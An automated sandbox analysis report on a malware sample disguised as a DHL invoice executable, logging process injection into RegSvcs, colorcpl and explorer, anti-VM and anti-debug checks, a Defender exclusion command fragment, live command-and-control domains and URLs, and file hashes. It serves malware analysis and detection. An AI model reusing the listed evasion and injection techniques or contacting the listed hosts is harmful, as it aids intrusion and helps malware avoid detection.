Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_01
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Mutant created: \Sessions\1\BaseNamedObjects\isCgyX
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: DHL-D02816048INV.exe, GameSettingsWindow.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.DHL-D02816048INV.exe.510000.0.unpack, GameSettingsWindow.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.DHL-D02816048INV.exe.510000.0.unpack, GameSettingsWindow.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00417857 push 00000004h; iretd	12_2_00417859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_004170BC push eax; iretd	12_2_004170C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041F1E8 push es; retn 0007h	12_2_0041F1E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041D4D2 push eax; ret	12_2_0041D4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041D4DB push eax; ret	12_2_0041D542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041D485 push eax; ret	12_2_0041D4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_004164A6 push FFFFFFC9h; ret	12_2_004164A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_0041D53C push eax; ret	12_2_0041D542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_004115C9 push ecx; ret	12_2_004115CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_004165A7 push cs; ret	12_2_004165BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_00F4D0D1 push ecx; ret	12_2_00F4D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_04E1D0D1 push ecx; ret	23_2_04E1D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E770BC push eax; iretd	23_2_00E770C9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E77857 push 00000004h; iretd	23_2_00E77859
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7E039 push ebp; retf	23_2_00E7E03C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7F1E8 push es; retn 0007h	23_2_00E7F1E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7D4D2 push eax; ret	23_2_00E7D4D8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7D4DB push eax; ret	23_2_00E7D542
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E764A6 push FFFFFFC9h; ret	23_2_00E764A8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7D485 push eax; ret	23_2_00E7D4D8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E715C9 push ecx; ret	23_2_00E715CA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E765A7 push cs; ret	23_2_00E765BA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 23_2_00E7D53C push eax; ret	23_2_00E7D542

Source: Yara match	File source: 0.2.DHL-D02816048INV.exe.29b1b7c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.346211763.0000000002991000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DHL-D02816048INV.exe PID: 7088, type: MEMORYSTR

Source: DHL-D02816048INV.exe, 00000000.00000002.346211763.0000000002991000.00000004.00000001.sdmp, DHL-D02816048INV.exe, 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: DHL-D02816048INV.exe, 00000000.00000002.346211763.0000000002991000.00000004.00000001.sdmp, DHL-D02816048INV.exe, 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 0000000000E69904 second address: 0000000000E6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe	RDTSC instruction interceptor: First address: 0000000000E69B7E second address: 0000000000E69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\DHL-D02816048INV.exe TID: 7092	Thread sleep time: -35086s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe TID: 7116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616	Thread sleep count: 5401 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep count: 260 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4776	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5883	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5401	Jump to behavior

Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Thread delayed: delay time: 35086	Jump to behavior
Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: DHL-D02816048INV.exe, 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: DHL-D02816048INV.exe, 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000E.00000000.358326330.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL-D02816048INV.exe, 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000E.00000000.380683794.000000000EE50000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 0000000E.00000000.358428077.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000E.00000000.353749235.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000E.00000000.358326330.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000E.00000000.380683794.000000000EE50000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: explorer.exe, 0000000E.00000000.353749235.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}wsTEMP
Source: explorer.exe, 0000000E.00000000.353749235.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 0000000E.00000000.358326330.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: DHL-D02816048INV.exe, 00000000.00000002.346425278.0000000002B28000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\DHL-D02816048INV.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 3352	Jump to behavior

Source: explorer.exe, 0000000E.00000000.387207449.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.417320351.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.349993548.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.367030320.00000000011E0000.00000002.00020000.sdmp, colorcpl.exe, 00000017.00000002.572708419.0000000003650000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000E.00000000.386796543.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.416988288.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.366705997.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.348598320.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 0000000E.00000000.387207449.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.417320351.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.353680385.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.349993548.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.367030320.00000000011E0000.00000002.00020000.sdmp, colorcpl.exe, 00000017.00000002.572708419.0000000003650000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.387207449.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.417320351.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.349993548.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.367030320.00000000011E0000.00000002.00020000.sdmp, colorcpl.exe, 00000017.00000002.572708419.0000000003650000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.387207449.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.417320351.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.349993548.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.367030320.00000000011E0000.00000002.00020000.sdmp, colorcpl.exe, 00000017.00000002.572708419.0000000003650000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000E.00000000.379237808.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.395273133.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.358428077.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Windows Analysis Report DHL-D02816048INV.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	IP	Active
mbwndp.g.ngxfence.org	170.33.14.35	true
www.tenloe036.xyz	unknown	unknown
www.stylists411.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.tenloe036.xyz/sbe5/?6lCD=2d_DYnvpcjZhuXNp&2drL=hJVLAZMnnNruOqbGQPlMF5VPc4ENbq+TMFifUDKwKaxhTHZ11JYQSb+b1d7n+ALeG6Br	true	Avira URL Cloud: safe	unknown
www.saponifiedeffects.com/sbe5/	true	Avira URL Cloud: safe	low

ID:	532856
Product:	CloudBasic
Start time:	18:55:41
Start date:	02.12.2021
Sample:	DHL-D02816048INV.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	b3fa350f2e1ece97a44ae6ae1248b5a1
SHA1:	05726361dd73119f77810887e4fc8a09d99167af
SHA256:	b5a0b2dd16e479af9029958ee35a367fad0d42a0b3d460c7cb95982ae27d1107
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL-D02816048INV.exe.log	Unknown	D918C6A765EDB90D2A227FE23A3FEC98	8BA802AD8D740F114783F0DADC407CBFD2A209B3	AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	5379A3BA6E4C13DC86D136E3BB09190B	D0F122F5416A7CBB585AF9192CE198C8775F3B0B	C1A3A35994225EB288AC7B90A83435CE92E92001648F06DA8C296290CEDA9CAE
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1swn2eji.epr.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5n041t3r.ga0.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nclnnser.0ae.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3njfxoy.vjk.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\tmpA63A.tmp	Unknown	F01C0F23EED83DF2B76CC770D651ACB6	9AB3A0D07BDBE81BCEBF1B21216F281F87FA33E8	F5CE694E521B839D1729008850FD1DECF3F54C353A7EA92789938208E3F888B3
C:\Users\user\AppData\Roaming\nWINpvYSWNVQ.exe	Unknown	B3FA350F2E1ECE97A44AE6AE1248B5A1	05726361DD73119F77810887E4FC8A09D99167AF	B5A0B2DD16E479AF9029958EE35A367FAD0D42A0B3D460C7CB95982AE27D1107
C:\Users\user\AppData\Roaming\nWINpvYSWNVQ.exe:Zone.Identifier	Unknown	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Documents\20211202\PowerShell_transcript.992547.HhPBCred.20211202185654.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	B9F8A64FB6B67AECDEEDD7F094EFF1BF	FC499352BB3CD9A1AD5926D4732D12DFD710B1B1	73F4AC21327206BC168C2759A379CC3D911920FEC13DC0BD90A01AD0B08EBCA2
C:\Users\user\Documents\20211202\PowerShell_transcript.992547.m+k2k9Lb.20211202185653.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	E2300C1569D7BE8A661DE18976610668	F1B38C57BE1952F0FC79FA0AC1D429E4B24991B0	20966A98602014A92451B7096CC0940C6643F22EA79D5FAE364A547499CB1F47